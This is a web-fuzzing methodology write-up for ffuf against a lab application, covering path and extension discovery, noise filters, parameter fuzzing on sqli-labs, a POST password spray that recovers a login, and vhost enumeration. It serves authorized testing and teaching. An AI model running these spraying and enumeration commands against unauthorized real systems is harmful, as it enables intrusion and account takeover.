Case file

Web content and parameter fuzzing with ffuf

Operator methodology for ffuf: directory and extension discovery, response filtering, GET/POST parameter and credential fuzzing, and Host-header vhost enumeration with noise reduction.

Foundations24 minWeb · Enumeration · ffuf
  • This case documents our standard web fuzzing playbook with ffuf against a lab application at 10.10.130.176 — discovery, filtering, parameter abuse, and credential spraying patterns we reuse on client assessments.

  • Baseline FUZZ against raft/big lists; extension fuzz found index.php and about.php.

  • Use -fc 403, -mc 200, -fs 0, and -fr to keep actionable hits.

  • burp-parameter-names discovered id=. Numeric STDIN fuzz found valid IDs. POST uname/passwd spray recovered Dummy / p@ssword.

  • Host-header vhost fuzz and -x / -replay-proxy for Burp integration.

01

Engagement summary

This case documents our standard web fuzzing playbook with ffuf against a lab application at 10.10.130.176 — discovery, filtering, parameter abuse, and credential spraying patterns we reuse on client assessments.

ffuf is our default HTTP fuzzer for content discovery and parameter testing. We calibrate wordlists from SecLists, reduce noise with -fc/-mc/-fs/-fw/-fr, and escalate from path discovery into parameter names, value ranges, and form credentials. The same options apply when we proxy through Burp for manual validation.

Operational note

Always rate-limit and scope fuzzing to authorized targets. Prefer filtered runs that surface 200/302 of interest over unfiltered floods that bury findings.

02

Content and extension discovery

Baseline FUZZ against raft/big lists; extension fuzz found index.php and about.php.

OPERATOR · FFUF PATHS

savvy@lab:~$ ffuf -u http://10.10.130.176/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt

favicon.ico [Status: 200, Size: 1406]

robots.txt [Status: 200, Size: 26]

about.php [Status: 200, Size: 4840]

login.php [Status: 200, Size: 1523]

setup.php [Status: 200, Size: 4067]

OPERATOR · EXTENSIONS

savvy@lab:~$ ffuf -u http://10.10.130.176/indexFUZZ -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt

index.php [Status: 200]

index.phps [Status: 200]

03

Noise reduction filters

Use -fc 403, -mc 200, -fs 0, and -fr to keep actionable hits.

OPERATOR · FILTERS

savvy@lab:~$ ffuf -u http://10.10.130.176/FUZZ -w raft-medium-files-lowercase.txt -fc 403

savvy@lab:~$ ffuf -u http://10.10.130.176/config/FUZZ -w raft-medium-files-lowercase.txt -fc 403

config.inc.php [Status: 200, Size: 0]

savvy@lab:~$ ffuf -u http://10.10.130.176/FUZZ -w raft-medium-files-lowercase.txt -fr '/\..*'

Operator tip

-fr preserves interesting 403s (e.g. backup extensions) that a blanket -fc 403 would hide.

04

Parameter and credential fuzzing

burp-parameter-names discovered id=. Numeric STDIN fuzz found valid IDs. POST uname/passwd spray recovered Dummy / p@ssword.

OPERATOR · PARAM NAMES

savvy@lab:~$ ffuf -u 'http://10.10.130.176/sqli-labs/Less-1/?FUZZ=1' -w burp-parameter-names.txt -fw 39

id [Status: 200]

OPERATOR · VALUE FUZZ

savvy@lab:~$ seq 0 255 | ffuf -u 'http://10.10.130.176/sqli-labs/Less-1/?id=FUZZ' -w - -fw 33

# highest valid id observed: 14

OPERATOR · POST CREDS

savvy@lab:~$ ffuf -u http://10.10.130.176/sqli-labs/Less-11/ -X POST -d 'uname=Dummy&passwd=FUZZ&submit=Submit' -w hak5.txt -fs 1435 -H 'Content-Type: application/x-www-form-urlencoded'

p@ssword [Status: 200]

05

Vhosts and Burp proxying

Host-header vhost fuzz and -x / -replay-proxy for Burp integration.

COMMANDS

ffuf -u http://mydomain.com -w subdomains-top1million-5000.txt \
  -H 'Host: FUZZ.mydomain.com' -fs 0

ffuf -u http://10.10.130.176/FUZZ -w common.txt -x http://127.0.0.1:8080
ffuf -u http://10.10.130.176/FUZZ -w common.txt -replay-proxy http://127.0.0.1:8080

Remediation (application owners)

Eliminate default/setup endpoints, enforce strong credentials, and monitor for high-rate fuzzing patterns from unauthorized sources.